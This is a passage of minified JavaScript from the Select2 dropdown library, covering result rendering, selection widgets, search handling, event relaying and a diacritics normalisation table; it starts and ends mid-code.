0===this.$results.children().length&&this.trigger("results:message",{message:"noResults"})},n.prototype.position=function(e,t){t.find(".select2-results").append(e)},n.prototype.sort=function(e){return this.options.get("sorter")(e)},n.prototype.highlightFirstItem=function(){var e=this.$results.find(".select2-results__option[aria-selected]"),t=e.filter("[aria-selected=true]");0<t.length?t.first().trigger("mouseenter"):e.first().trigger("mouseenter"),this.ensureHighlightVisible()},n.prototype.setClasses=function(){var t=this;this.data.current(function(e){var n=h.map(e,function(e){return e.id.toString()});t.$results.find(".select2-results__option[aria-selected]").each(function(){var e=h(this),t=h.data(this,"data"),i=""+t.id;null!=t.element&&t.element.selected||null==t.element&&-1<h.inArray(i,n)?e.attr("aria-selected","true"):e.attr("aria-selected","false")})})},n.prototype.showLoading=function(e){this.hideLoading();var t={disabled:!0,loading:!0,text:this.options.get("translations").get("searching")(e)},i=this.option(t);i.className+=" loading-results",this.$results.prepend(i)},n.prototype.hideLoading=function(){this.$results.find(".loading-results").remove()},n.prototype.option=function(e){var t=document.createElement("li");t.className="select2-results__option";var i={role:"treeitem","aria-selected":"false"};for(var n in e.disabled&&(delete i["aria-selected"],i["aria-disabled"]="true"),null==e.id&&delete i["aria-selected"],null!=e._resultId&&(t.id=e._resultId),e.title&&(t.title=e.title),e.children&&(i.role="group",i["aria-label"]=e.text,delete i["aria-selected"]),i){var o=i[n];t.setAttribute(n,o)}if(e.children){var s=h(t),a=document.createElement("strong");a.className="select2-results__group",h(a),this.template(e,a);for(var r=[],l=0;l<e.children.length;l++){var c=e.children[l],u=this.option(c);r.push(u)}var d=h("<ul></ul>",{class:"select2-results__options select2-results__options--nested"});d.append(r),s.append(a),s.append(d)}else this.template(e,t);return h.data(t,"data",e),t},n.prototype.bind=function(t,e){var l=this,i=t.id+"-results";this.$results.attr("id",i),t.on("results:all",function(e){l.clear(),l.append(e.data),t.isOpen()&&(l.setClasses(),l.highlightFirstItem())}),t.on("results:append",function(e){l.append(e.data),t.isOpen()&&l.setClasses()}),t.on("query",function(e){l.hideMessages(),l.showLoading(e)}),t.on("select",function(){t.isOpen()&&(l.setClasses(),l.highlightFirstItem())}),t.on("unselect",function(){t.isOpen()&&(l.setClasses(),l.highlightFirstItem())}),t.on("open",function(){l.$results.attr("aria-expanded","true"),l.$results.attr("aria-hidden","false"),l.setClasses(),l.ensureHighlightVisible()}),t.on("close",function(){l.$results.attr("aria-expanded","false"),l.$results.attr("aria-hidden","true"),l.$results.removeAttr("aria-activedescendant")}),t.on("results:toggle",function(){var e=l.getHighlightedResults();0!==e.length&&e.trigger("mouseup")}),t.on("results:select",function(){var e=l.getHighlightedResults();if(0!==e.length){var t=e.data("data");"true"==e.attr("aria-selected")?l.trigger("close",{}):l.trigger("select",{data:t})}}),t.on("results:previous",function(){var e=l.getHighlightedResults(),t=l.$results.find("[aria-selected]"),i=t.index(e);if(0!==i){var n=i-1;0===e.length&&(n=0);var o=t.eq(n);o.trigger("mouseenter");var s=l.$results.offset().top,a=o.offset().top,r=l.$results.scrollTop()+(a-s);0===n?l.$results.scrollTop(0):a-s<0&&l.$results.scrollTop(r)}}),t.on("results:next",function(){var e=l.getHighlightedResults(),t=l.$results.find("[aria-selected]"),i=t.index(e)+1;if(!(i>=t.length)){var n=t.eq(i);n.trigger("mouseenter");var o=l.$results.offset().top+l.$results.outerHeight(!1),s=n.offset().top+n.outerHeight(!1),a=l.$results.scrollTop()+s-o;0===i?l.$results.scrollTop(0):o<s&&l.$results.scrollTop(a)}}),t.on("results:focus",function(e){e.element.addClass("select2-results__option--highlighted")}),t.on("results:message",function(e){l.displayMessage(e)}),h.fn.mousewheel&&this.$results.on("mousewheel",function(e){var t=l.$results.scrollTop(),i=l.$results.get(0).scrollHeight-t+e.deltaY,n=0<e.deltaY&&t-e.deltaY<=0,o=e.deltaY<0&&i<=l.$results.height();n?(l.$results.scrollTop(0),e.preventDefault(),e.stopPropagation()):o&&(l.$results.scrollTop(l.$results.get(0).scrollHeight-l.$results.height()),e.preventDefault(),e.stopPropagation())}),this.$results.on("mouseup",".select2-results__option[aria-selected]",function(e){var t=h(this),i=t.data("data");"true"!==t.attr("aria-selected")?l.trigger("select",{originalEvent:e,data:i}):l.options.get("multiple")?l.trigger("unselect",{originalEvent:e,data:i}):l.trigger("close",{})}),this.$results.on("mouseenter",".select2-results__option[aria-selected]",function(e){var t=h(this).data("data");l.getHighlightedResults().removeClass("select2-results__option--highlighted"),l.trigger("results:focus",{data:t,element:h(this)})})},n.prototype.getHighlightedResults=function(){return this.$results.find(".select2-results__option--highlighted")},n.prototype.destroy=function(){this.$results.remove()},n.prototype.ensureHighlightVisible=function(){var e=this.getHighlightedResults();if(0!==e.length){var t=this.$results.find("[aria-selected]").index(e),i=this.$results.offset().top,n=e.offset().top,o=this.$results.scrollTop()+(n-i),s=n-i;o-=2*e.outerHeight(!1),t<=2?this.$results.scrollTop(0):(s>this.$results.outerHeight()||s<0)&&this.$results.scrollTop(o)}},n.prototype.template=function(e,t){var i=this.options.get("templateResult"),n=this.options.get("escapeMarkup"),o=i(e,t);null==o?t.style.display="none":"string"==typeof o?t.innerHTML=n(o):h(t).append(o)},n}),e.define("select2/keys",[],function(){return{BACKSPACE:8,TAB:9,ENTER:13,SHIFT:16,CTRL:17,ALT:18,ESC:27,SPACE:32,PAGE_UP:33,PAGE_DOWN:34,END:35,HOME:36,LEFT:37,UP:38,RIGHT:39,DOWN:40,DELETE:46}}),e.define("select2/selection/base",["jquery","../utils","../keys"],function(i,e,o){function n(e,t){this.$element=e,this.options=t,n.__super__.constructor.call(this)}return e.Extend(n,e.Observable),n.prototype.render=function(){var e=i('<span class="select2-selection" role="combobox" aria-haspopup="true" aria-expanded="false"></span>');return this._tabindex=0,null!=this.$element.data("old-tabindex")?this._tabindex=this.$element.data("old-tabindex"):null!=this.$element.attr("tabindex")&&(this._tabindex=this.$element.attr("tabindex")),e.attr("title",this.$element.attr("title")),e.attr("tabindex",this._tabindex),this.$selection=e},n.prototype.bind=function(e,t){var i=this,n=(e.id,e.id+"-results");this.container=e,this.$selection.on("focus",function(e){i.trigger("focus",e)}),this.$selection.on("blur",function(e){i._handleBlur(e)}),this.$selection.on("keydown",function(e){i.trigger("keypress",e),e.which===o.SPACE&&e.preventDefault()}),e.on("results:focus",function(e){i.$selection.attr("aria-activedescendant",e.data._resultId)}),e.on("selection:update",function(e){i.update(e.data)}),e.on("open",function(){i.$selection.attr("aria-expanded","true"),i.$selection.attr("aria-owns",n),i._attachCloseHandler(e)}),e.on("close",function(){i.$selection.attr("aria-expanded","false"),i.$selection.removeAttr("aria-activedescendant"),i.$selection.removeAttr("aria-owns"),i.$selection.focus(),i._detachCloseHandler(e)}),e.on("enable",function(){i.$selection.attr("tabindex",i._tabindex)}),e.on("disable",function(){i.$selection.attr("tabindex","-1")})},n.prototype._handleBlur=function(e){var t=this;window.setTimeout(function(){document.activeElement==t.$selection[0]||i.contains(t.$selection[0],document.activeElement)||t.trigger("blur",e)},1)},n.prototype._attachCloseHandler=function(e){i(document.body).on("mousedown.select2."+e.id,function(e){var t=i(e.target).closest(".select2");i(".select2.select2-container--open").each(function(){var e=i(this);this!=t[0]&&e.data("element").select2("close")})})},n.prototype._detachCloseHandler=function(e){i(document.body).off("mousedown.select2."+e.id)},n.prototype.position=function(e,t){t.find(".selection").append(e)},n.prototype.destroy=function(){this._detachCloseHandler(this.container)},n.prototype.update=function(e){throw new Error("The `update` method must be defined in child classes.")},n}),e.define("select2/selection/single",["jquery","./base","../utils","../keys"],function(e,t,i,n){function o(){o.__super__.constructor.apply(this,arguments)}return i.Extend(o,t),o.prototype.render=function(){var e=o.__super__.render.call(this);return e.addClass("select2-selection--single"),e.html('<span class="select2-selection__rendered"></span><span class="select2-selection__arrow" role="presentation"><b role="presentation"></b></span>'),e},o.prototype.bind=function(t,e){var i=this;o.__super__.bind.apply(this,arguments);var n=t.id+"-container";this.$selection.find(".select2-selection__rendered").attr("id",n),this.$selection.attr("aria-labelledby",n),this.$selection.on("mousedown",function(e){1===e.which&&i.trigger("toggle",{originalEvent:e})}),this.$selection.on("focus",function(e){}),this.$selection.on("blur",function(e){}),t.on("focus",function(e){t.isOpen()||i.$selection.focus()}),t.on("selection:update",function(e){i.update(e.data)})},o.prototype.clear=function(){this.$selection.find(".select2-selection__rendered").empty()},o.prototype.display=function(e,t){var i=this.options.get("templateSelection");return this.options.get("escapeMarkup")(i(e,t))},o.prototype.selectionContainer=function(){return e("<span></span>")},o.prototype.update=function(e){if(0!==e.length){var t=e[0],i=this.$selection.find(".select2-selection__rendered"),n=this.display(t,i);i.empty().append(n),i.prop("title",t.title||t.text)}else this.clear()},o}),e.define("select2/selection/multiple",["jquery","./base","../utils"],function(n,e,r){function o(e,t){o.__super__.constructor.apply(this,arguments)}return r.Extend(o,e),o.prototype.render=function(){var e=o.__super__.render.call(this);return e.addClass("select2-selection--multiple"),e.html('<ul class="select2-selection__rendered"></ul>'),e},o.prototype.bind=function(e,t){var i=this;o.__super__.bind.apply(this,arguments),this.$selection.on("click",function(e){i.trigger("toggle",{originalEvent:e})}),this.$selection.on("click",".select2-selection__choice__remove",function(e){if(!i.options.get("disabled")){var t=n(this).parent().data("data");i.trigger("unselect",{originalEvent:e,data:t})}})},o.prototype.clear=function(){this.$selection.find(".select2-selection__rendered").empty()},o.prototype.display=function(e,t){var i=this.options.get("templateSelection");return this.options.get("escapeMarkup")(i(e,t))},o.prototype.selectionContainer=function(){return n('<li class="select2-selection__choice"><span class="select2-selection__choice__remove" role="presentation">&times;</span></li>')},o.prototype.update=function(e){if(this.clear(),0!==e.length){for(var t=[],i=0;i<e.length;i++){var n=e[i],o=this.selectionContainer(),s=this.display(n,o);o.append(s),o.prop("title",n.title||n.text),o.data("data",n),t.push(o)}var a=this.$selection.find(".select2-selection__rendered");r.appendMany(a,t)}},o}),e.define("select2/selection/placeholder",["../utils"],function(e){function t(e,t,i){this.placeholder=this.normalizePlaceholder(i.get("placeholder")),e.call(this,t,i)}return t.prototype.normalizePlaceholder=function(e,t){return"string"==typeof t&&(t={id:"",text:t}),t},t.prototype.createPlaceholder=function(e,t){var i=this.selectionContainer();return i.html(this.display(t)),i.addClass("select2-selection__placeholder").removeClass("select2-selection__choice"),i},t.prototype.update=function(e,t){var i=1==t.length&&t[0].id!=this.placeholder.id;if(1<t.length||i)return e.call(this,t);this.clear();var n=this.createPlaceholder(this.placeholder);this.$selection.find(".select2-selection__rendered").append(n)},t}),e.define("select2/selection/allowClear",["jquery","../keys"],function(n,o){function e(){}return e.prototype.bind=function(e,t,i){var n=this;e.call(this,t,i),null==this.placeholder&&this.options.get("debug")&&window.console&&console.error&&console.error("Select2: The `allowClear` option should be used in combination with the `placeholder` option."),this.$selection.on("mousedown",".select2-selection__clear",function(e){n._handleClear(e)}),t.on("keypress",function(e){n._handleKeyboardClear(e,t)})},e.prototype._handleClear=function(e,t){if(!this.options.get("disabled")){var i=this.$selection.find(".select2-selection__clear");if(0!==i.length){t.stopPropagation();for(var n=i.data("data"),o=0;o<n.length;o++){var s={data:n[o]};if(this.trigger("unselect",s),s.prevented)return}this.$element.val(this.placeholder.id).trigger("change"),this.trigger("toggle",{})}}},e.prototype._handleKeyboardClear=function(e,t,i){i.isOpen()||t.which!=o.DELETE&&t.which!=o.BACKSPACE||this._handleClear(t)},e.prototype.update=function(e,t){if(e.call(this,t),!(0<this.$selection.find(".select2-selection__placeholder").length||0===t.length)){var i=n('<span class="select2-selection__clear">&times;</span>');i.data("data",t),this.$selection.find(".select2-selection__rendered").prepend(i)}},e}),e.define("select2/selection/search",["jquery","../utils","../keys"],function(n,e,a){function t(e,t,i){e.call(this,t,i)}return t.prototype.render=function(e){var t=n('<li class="select2-search select2-search--inline"><input class="select2-search__field" type="search" tabindex="-1" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false" role="textbox" aria-autocomplete="list" /></li>');this.$searchContainer=t,this.$search=t.find("input");var i=e.call(this);return this._transferTabIndex(),i},t.prototype.bind=function(e,t,i){var n=this;e.call(this,t,i),t.on("open",function(){n.$search.trigger("focus")}),t.on("close",function(){n.$search.val(""),n.$search.removeAttr("aria-activedescendant"),n.$search.trigger("focus")}),t.on("enable",function(){n.$search.prop("disabled",!1),n._transferTabIndex()}),t.on("disable",function(){n.$search.prop("disabled",!0)}),t.on("focus",function(e){n.$search.trigger("focus")}),t.on("results:focus",function(e){n.$search.attr("aria-activedescendant",e.id)}),this.$selection.on("focusin",".select2-search--inline",function(e){n.trigger("focus",e)}),this.$selection.on("focusout",".select2-search--inline",function(e){n._handleBlur(e)}),this.$selection.on("keydown",".select2-search--inline",function(e){if(e.stopPropagation(),n.trigger("keypress",e),n._keyUpPrevented=e.isDefaultPrevented(),e.which===a.BACKSPACE&&""===n.$search.val()){var t=n.$searchContainer.prev(".select2-selection__choice");if(0<t.length){var i=t.data("data");n.searchRemoveChoice(i),e.preventDefault()}}});var o=document.documentMode,s=o&&o<=11;this.$selection.on("input.searchcheck",".select2-search--inline",function(e){s?n.$selection.off("input.search input.searchcheck"):n.$selection.off("keyup.search")}),this.$selection.on("keyup.search input.search",".select2-search--inline",function(e){if(s&&"input"===e.type)n.$selection.off("input.search input.searchcheck");else{var t=e.which;t!=a.SHIFT&&t!=a.CTRL&&t!=a.ALT&&t!=a.TAB&&n.handleSearch(e)}})},t.prototype._transferTabIndex=function(e){this.$search.attr("tabindex",this.$selection.attr("tabindex")),this.$selection.attr("tabindex","-1")},t.prototype.createPlaceholder=function(e,t){this.$search.attr("placeholder",t.text)},t.prototype.update=function(e,t){var i=this.$search[0]==document.activeElement;this.$search.attr("placeholder",""),e.call(this,t),this.$selection.find(".select2-selection__rendered").append(this.$searchContainer),this.resizeSearch(),i&&this.$search.focus()},t.prototype.handleSearch=function(){if(this.resizeSearch(),!this._keyUpPrevented){var e=this.$search.val();this.trigger("query",{term:e})}this._keyUpPrevented=!1},t.prototype.searchRemoveChoice=function(e,t){this.trigger("unselect",{data:t}),this.$search.val(t.text),this.handleSearch()},t.prototype.resizeSearch=function(){this.$search.css("width","25px");var e="";e=""!==this.$search.attr("placeholder")?this.$selection.find(".select2-selection__rendered").innerWidth():.75*(this.$search.val().length+1)+"em",this.$search.css("width",e)},t}),e.define("select2/selection/eventRelay",["jquery"],function(a){function e(){}return e.prototype.bind=function(e,t,i){var n=this,o=["open","opening","close","closing","select","selecting","unselect","unselecting"],s=["opening","closing","selecting","unselecting"];e.call(this,t,i),t.on("*",function(e,t){if(-1!==a.inArray(e,o)){t=t||{};var i=a.Event("select2:"+e,{params:t});n.$element.trigger(i),-1!==a.inArray(e,s)&&(t.prevented=i.isDefaultPrevented())}})},e}),e.define("select2/translation",["jquery","require"],function(t,i){function n(e){this.dict=e||{}}return n.prototype.all=function(){return this.dict},n.prototype.get=function(e){return this.dict[e]},n.prototype.extend=function(e){this.dict=t.extend({},e.all(),this.dict)},n._cache={},n.loadPath=function(e){if(!(e in n._cache)){var t=i(e);n._cache[e]=t}return new n(n._cache[e])},n}),e.define("select2/diacritics",[],function(){return{"Ⓐ":"A","A":"A","À":"A","Á":"A","Â":"A","Ầ":"A","Ấ":"A","Ẫ":"A","Ẩ":"A","Ã":"A","Ā":"A","Ă":"A","Ằ":"A","Ắ":"A","Ẵ":"A","Ẳ":"A","Ȧ":"A","Ǡ":"A","Ä":"A","Ǟ":"A","Ả":"A","Å":"A","Ǻ":"A","Ǎ":"A","Ȁ":"A","Ȃ":"A","Ạ":"A","Ậ":"A","Ặ":"A","Ḁ":"A","Ą":"A","Ⱥ":"A","Ɐ":"A","Ꜳ":"AA","Æ":"AE","Ǽ":"AE","Ǣ":"AE","Ꜵ":"AO","Ꜷ":"AU","Ꜹ":"AV","Ꜻ":"AV","Ꜽ":"AY","Ⓑ":"B","B":"B","Ḃ":"B","Ḅ":"B","Ḇ":"B","Ƀ":"B","Ƃ":"B","Ɓ":"B","Ⓒ":"C","C":"C","Ć":"C","Ĉ":"C","Ċ":"C","Č":"C","Ç":"C","Ḉ":"C","Ƈ":"C","Ȼ":"C","Ꜿ":"C","Ⓓ":"D","D":"D","Ḋ":"D","Ď":"D","Ḍ":"D","Ḑ":"D","Ḓ":"D","Ḏ":"D","Đ":"D","Ƌ":"D","Ɗ":"D","Ɖ":"D","Ꝺ":"D","DZ":"DZ","DŽ":"DZ","Dz":"Dz","Dž":"Dz","Ⓔ":"E","E":"E","È":"E","É":"E","Ê":"E","Ề":"E","Ế":"E","Ễ":"E","Ể":"E","Ẽ":"E","Ē":"E","Ḕ":"E","Ḗ":"E","Ĕ":"E","Ė":"E","Ë":"E","Ẻ":"E","Ě":"E","Ȅ":"E","Ȇ":"E","Ẹ":"E","Ệ":"E","Ȩ":"E","Ḝ":"E","Ę":"E","Ḙ":"E","Ḛ":"E","Ɛ":"E","Ǝ":"E","Ⓕ":"F","F":"F","Ḟ":"F","Ƒ":"F","Ꝼ":"F","Ⓖ":"G","G":"G","Ǵ":"G","Ĝ":"G","Ḡ":"G","Ğ":"G","Ġ":"G","Ǧ":"G","Ģ":"G","Ǥ":"G","Ɠ":"G","Ꞡ":"G","Ᵹ":"G","Ꝿ":"G","Ⓗ":"H","H":"H","Ĥ":"H","Ḣ":"H","Ḧ":"H","Ȟ":"H","Ḥ":"H","Ḩ":"H","Ḫ":"H","Ħ":"H","Ⱨ":"H","Ⱶ":"H","Ɥ":"H","Ⓘ":"I","I":"I","Ì":"I","Í":"I","Î":"I","Ĩ":"I","Ī":"I","Ĭ":"I","İ":"I","Ï":"I","Ḯ":"I","Ỉ":"I","Ǐ":"I","Ȉ":"I","Ȋ":"I","Ị":"I","Į":"I","Ḭ":"I","Ɨ":"I","Ⓙ":"J","J":"J","Ĵ":"J","Ɉ":"J","Ⓚ":"K","K":"K","Ḱ":"K","Ǩ":"K","Ḳ":"K","Ķ":"K","Ḵ":"K","Ƙ":"K","Ⱪ":"K","Ꝁ":"K","Ꝃ":"K","Ꝅ":"K","Ꞣ":"K","Ⓛ":"L","L":"L","Ŀ":"L","Ĺ":"L","Ľ":"L","Ḷ":"L","Ḹ":"L","Ļ":"L","Ḽ":"L","Ḻ":"L","Ł":"L","Ƚ":"L","Ɫ":"L","Ⱡ":"L","Ꝉ":"L","Ꝇ":"L","Ꞁ":"L","LJ":"LJ","Lj":"Lj","Ⓜ":"M","M":"M","Ḿ":"M","Ṁ":"M","Ṃ":"M","Ɱ":"M","Ɯ":"M","Ⓝ":"N","N":"N","Ǹ":"N","Ń":"N","Ñ":"N","Ṅ":"N","Ň":"N","Ṇ":"N","Ņ":"N","Ṋ":"N","Ṉ":"N","Ƞ":"N","Ɲ":"N","Ꞑ":"N","Ꞥ":"N","NJ":"NJ","Nj":"Nj","Ⓞ":"O","O":"O","Ò":"O","Ó":"O","Ô":"O","Ồ":"O","Ố":"O","Ỗ":"O","Ổ":"O","Õ":"O","Ṍ":"O","Ȭ":"O","Ṏ":"O","Ō":"O","Ṑ":"O","Ṓ":"O","Ŏ":"O","Ȯ":"O","Ȱ":"O","Ö":"O","Ȫ":"O","Ỏ":"O","Ő":"O","Ǒ":"O","Ȍ":"O","Ȏ":"O","Ơ":"O","Ờ":"O","Ớ":"O","Ỡ":"O","Ở":"O","Ợ":"O","Ọ":"O","Ộ":"O","Ǫ":"O","Ǭ":"O","Ø":"O","Ǿ":"O","Ɔ":"O","Ɵ":"O","Ꝋ":"O","Ꝍ":"O","Ƣ":"OI","Ꝏ":"OO","Ȣ":"OU","Ⓟ":"P","P":"P","Ṕ":"P","Ṗ":"P","Ƥ":"P","Ᵽ":"P","Ꝑ":"P","Ꝓ":"P","Ꝕ":"P","Ⓠ":"Q","Q":"Q","Ꝗ":"Q","Ꝙ":"Q","Ɋ":"Q","Ⓡ":"R","R":"R","Ŕ":"R","Ṙ":"R","Ř":"R","Ȑ":"R","Ȓ":"R","Ṛ":"R","Ṝ":"R","Ŗ":"R","Ṟ":"R","Ɍ":"R","Ɽ":"R","Ꝛ":"R","Ꞧ":"R","Ꞃ":"R","Ⓢ":"S","S":"S","ẞ":"S","Ś":"S","Ṥ":"S","Ŝ":"S","Ṡ":"S","Š":"S","Ṧ":"S","Ṣ":"S","Ṩ":"S","Ș":"S","Ş":"S","Ȿ":"S","Ꞩ":"S","Ꞅ":"S","Ⓣ":"T","T":"T","Ṫ":"T","Ť":"T","Ṭ":"T","Ț":"T","Ţ":"T","Ṱ":"T","Ṯ":"T","Ŧ":"T","Ƭ":"T","Ʈ":"T","Ⱦ":"T","Ꞇ":"T","Ꜩ":"TZ","Ⓤ":"U","U":"U","Ù":"U","Ú":"U","Û":"U","Ũ":"U","Ṹ":"U","Ū":"U","Ṻ":"U","Ŭ":"U","Ü":"U","Ǜ":"U","Ǘ":"U","Ǖ":"U","Ǚ":"U","Ủ":"U","Ů":"U","Ű":"U","Ǔ":"U","Ȕ":"U","Ȗ":"U","Ư":"U","Ừ":"U","Ứ":"U","Ữ":"U","Ử":"U","Ự":"U","Ụ":"U","Ṳ":"U","Ų":"U","Ṷ":"U","Ṵ":"U","Ʉ":"U","Ⓥ":"V","V":"V","Ṽ":"V","Ṿ":"V","Ʋ":"V","Ꝟ":"V","Ʌ":"V","Ꝡ":"VY","Ⓦ":"W","W":"W","Ẁ":"W","Ẃ":"W","Ŵ":"W","Ẇ":"W","Ẅ":"W","Ẉ":"W","Ⱳ":"W","Ⓧ":"X","X":"X","Ẋ":"X","Ẍ":"X","Ⓨ":"Y","Y":"Y","Ỳ":"Y","Ý":"Y","Ŷ":"Y","Ỹ":"Y","Ȳ":"Y","Ẏ":"Y","Ÿ":"Y","Ỷ":"Y","Ỵ":"Y","Ƴ":"Y","Ɏ":"Y","Ỿ":"Y","Ⓩ":"Z","Z":"Z","Ź":"Z","Ẑ":"Z","Ż":"Z","Ž":"Z","Ẓ":"Z","Ẕ":"Z","Ƶ":"Z","Ȥ":"Z","Ɀ":"Z","Ⱬ":"Z","Ꝣ":"Z","ⓐ":"a","a":"a","ẚ":"a","à":"a","á":"a","â":"a","ầ":"a","ấ":"a","ẫ":"a","ẩ":"a","ã":"a","ā":"a","ă":"a","ằ":"a","ắ":"a","ẵ":"a","ẳ":"a","ȧ":"a","ǡ":"a","ä":"a","ǟ":"a","ả":"a","å":"a","ǻ":"a","ǎ":"a","ȁ":"a","ȃ":"a","ạ":"a","ậ":"a","ặ":"a","ḁ":"a","ą":"a","ⱥ":"a","ɐ":"a","ꜳ":"aa","æ":"ae","ǽ":"ae","ǣ":"ae","ꜵ":"ao","ꜷ":"au","ꜹ":"av","ꜻ":"av","ꜽ":"ay","ⓑ":"b","b":"b","ḃ":"b","ḅ":"b","ḇ":"b","ƀ":"b","ƃ":"b","ɓ":"b","ⓒ":"c","c":"c","ć":"c","ĉ":"c","ċ":"c","č":"c","ç":"c","ḉ":"c","ƈ":"c","ȼ":"c","ꜿ":"c","ↄ":"c","ⓓ":"d","d":"d","ḋ":"d","ď":"d","ḍ":"d","ḑ":"d","ḓ":"d","ḏ":"d","đ":"d","ƌ":"d","ɖ":"d","ɗ":"d","ꝺ":"d","dz":"dz","dž":"dz","ⓔ":"e","e":"e","è":"e","é":"e","ê":"e","ề":"e","ế":"e","ễ":"e","ể":"e","ẽ":"e","ē":"e","ḕ":"e","ḗ":"e","ĕ":"e","ė":"e","ë":"e","ẻ":"e","ě":"e","ȅ":"e","ȇ":"e","ẹ":"e","ệ":"e","ȩ":"e","ḝ":"e","ę":"e","ḙ":"e","ḛ":"e","ɇ":"e","ɛ":"e","ǝ":"e","ⓕ":"f","f":"f","ḟ":"f","ƒ":"f","ꝼ":"f","ⓖ":"g","g":"g","ǵ":"g","ĝ":"g","ḡ":"g","ğ":"g","ġ":"g","ǧ":"g","ģ":"g","ǥ":"g","ɠ":"g","ꞡ":"g","ᵹ":"g","ꝿ":"g","ⓗ":"h","h":"h","ĥ":"h","ḣ":"h","ḧ":"h","ȟ":"h","ḥ":"h","ḩ":"h","ḫ":"h","ẖ":"h","ħ":"h","ⱨ":"h","ⱶ":"h","ɥ":"h","ƕ":"hv","ⓘ":"i","i":"i","ì":"i","í":"i","î":"i","ĩ":"i","ī":"i","ĭ":"i","ï":"i","ḯ":"i","ỉ":"i","ǐ":"i","ȉ":"i","ȋ":"i","ị":"i","į":"i","ḭ":"i","ɨ":"i","ı":"i","ⓙ":"j","j":"j","ĵ":"j","ǰ":"j","ɉ":"j","ⓚ":"k","k":"k","ḱ":"k","ǩ":"k","ḳ":"k","ķ":"k","ḵ":"k","ƙ":"k","ⱪ":"k","ꝁ":"k","ꝃ":"k","ꝅ":"k","ꞣ":"k","ⓛ":"l","l":"l","ŀ":"l","ĺ":"l","ľ":"l","ḷ":"l","ḹ":"l","ļ":"l","ḽ":"l","ḻ":"l","ſ":"l","ł":"l","ƚ":"l","ɫ":"l","ⱡ":"l","ꝉ":"l","ꞁ":"l","ꝇ":"l","lj":"lj","ⓜ":"m","m":"m","ḿ":"m","ṁ":"m","ṃ":"m","ɱ":"m","ɯ":"m","ⓝ":"n","n":"n","ǹ":"n","ń":"n","ñ":"n","ṅ":"n","ň":"n","ṇ":"n","ņ":"n","ṋ":"n","ṉ":"n","ƞ":"n","ɲ":"n","ʼn":"n","ꞑ":"n","ꞥ":"n","nj":"nj","ⓞ":"o","o":"o","ò":"o","ó":"o","ô":"o","ồ":"o","ố":"o","ỗ":"o","ổ":"o","õ":"o","ṍ":"o","ȭ":"o","ṏ":"o","ō":"o","ṑ":"o","ṓ":"o","ŏ":"o","ȯ":"o","ȱ":"o","ö":"o","ȫ":"o","ỏ":"o","ő":"o","ǒ":"o","ȍ":"o","ȏ":"o","ơ":"o","ờ":"o","ớ":"o","ỡ":"o","ở":"o","ợ":"o","ọ":"o","ộ":"o","ǫ":"o","ǭ":"o","ø":"o","ǿ":"o","ɔ":"o","ꝋ":"o","ꝍ":"o","ɵ":"o","ƣ":"oi","ȣ":"ou","ꝏ":"oo","ⓟ":"p","p":"p","ṕ":"p","ṗ":"p","ƥ":"p","ᵽ":"p","ꝑ":"p","ꝓ":"p","ꝕ":"p","ⓠ":"q","q":"q","ɋ":"q","ꝗ":"q","ꝙ":"q","ⓡ":"r","r":"r","ŕ":"r","ṙ":"r","ř":"r","ȑ":"r","ȓ":"r","ṛ":"r","ṝ":"r","ŗ":"r","ṟ":"r","ɍ":"r","ɽ":"r","ꝛ":"r","ꞧ":"r","ꞃ":"r","ⓢ":"s","s":"s","ß":"s","ś":"s","ṥ":"s","ŝ":"s","ṡ":"s","š":"s","ṧ":"s","ṣ":"s","ṩ":"s","ș":"s","ş":"s","ȿ":"s","ꞩ":"s","ꞅ":"s","ẛ":"s","ⓣ":"t","t":"t","ṫ":"t","ẗ":"t","ť":"t","ṭ":"t","ț":"t","ţ":"t","ṱ":"t","ṯ":"t","ŧ":"t","ƭ":"t","ʈ":"t","ⱦ":"t","ꞇ":"t","ꜩ":"tz","ⓤ":"u","u":"u","ù":"u","ú":"u","û":"u","ũ":"u","ṹ":"u","ū":"u","ṻ":"u","ŭ":"u","ü":"u","ǜ":"u","ǘ":"u","ǖ":"u","ǚ":"u","ủ":"u","ů":"u","ű":"u","ǔ":"u","ȕ":"u","ȗ":"u","ư":"u","ừ":"u","ứ":"u","ữ":"u","ử":"u","ự":"u","ụ":"u","ṳ":"u","ų":"u","ṷ":"u","ṵ":"u","ʉ":"u","ⓥ":"v","v":"v","ṽ":"v","ṿ":"v","ʋ":"v","ꝟ":"v","ʌ":"v","ꝡ":"vy","ⓦ":"w","w":"w","ẁ":"w","ẃ":"w","ŵ":"w","ẇ":"w","ẅ":"w","ẘ":"w","ẉ":"w","ⱳ":"w","ⓧ":"x","x":"x","ẋ":"x","ẍ":"x","ⓨ":"y","y":"y","ỳ":"y","ý":"y","ŷ":"y","ỹ":"y","ȳ":"y","ẏ":"y","ÿ":"y","ỷ":"y","ẙ":"y","ỵ":"y","ƴ":"y","ɏ":"y","ỿ":"y","ⓩ":"z","z":"z","ź":"z","ẑ":"z","ż":"z","ž":"z","ẓ":"z","ẕ":"z","ƶ":"z","ȥ":"z","ɀ":"z","ⱬ":"z","ꝣ":"z","Ά":"Α","Έ":"Ε","Ή":"Η","Ί":"Ι","Ϊ":"Ι","Ό":"Ο","Ύ":"Υ","Ϋ":"Υ","Ώ":"Ω","ά":"α","έ":"ε","ή":"η","ί":"ι","ϊ":"ι","ΐ":"ι","ό":"ο","ύ":"υ","ϋ":"υ","ΰ":"υ","ω":"ω","ς":"σ"}}),e.define("select2/data/base",["../utils"],function(n){function i(e,t){i.__super__.constructor.call(this)}return n.Extend(i,n.Observable),i.prototype.current=function(e){throw new Error("The `current` method must be defined in child classes.")},i.prototype.query=function(e,t){throw new Error("The `query` method must be defined in child classes.")},i.prototype.bind=function(e,t){},i.prototype.destroy=function(){},i.prototype.generateResultId=function(e,t){var i=e.id+"-result-";return i+=n.generateChars(4),null!=t.id?i+="-"+t.id.toString():i+="-"+n.generateChars(4),i},i}),e.define("select2/data/select",["./base","../utils","jquery"],function(e,t,r){function i(e,t){this.$element=e,this.options=t,i.__super__.constructor.call(this)}return t.Extend(i,e),i.prototype.current=function(e){var i=[],n=this;this.$element.find(":selected").each(function(){var e=r(this),t=n.item(e);i.push(t)}),e(i)},i.prototype.select=function(o){var s=this;if(o.selected=!0,r(o.element).is("option"))return o.element.selected=!0,void this.$element.trigger("change");if(this.$element.prop("multiple"))this.current(function(e){var t=[];(o=[o]).push.apply(o,e);for(var i=0;i<o.length;i++){var n=o[i].id;-1===r.inArray(n,t)&&t.push(n)}s.$element.val(t),s.$element.trigger("change")});else{var e=o.id;this.$element.val(e),this.$element.trigger("change")}},i.prototype.unselect=function(o){var 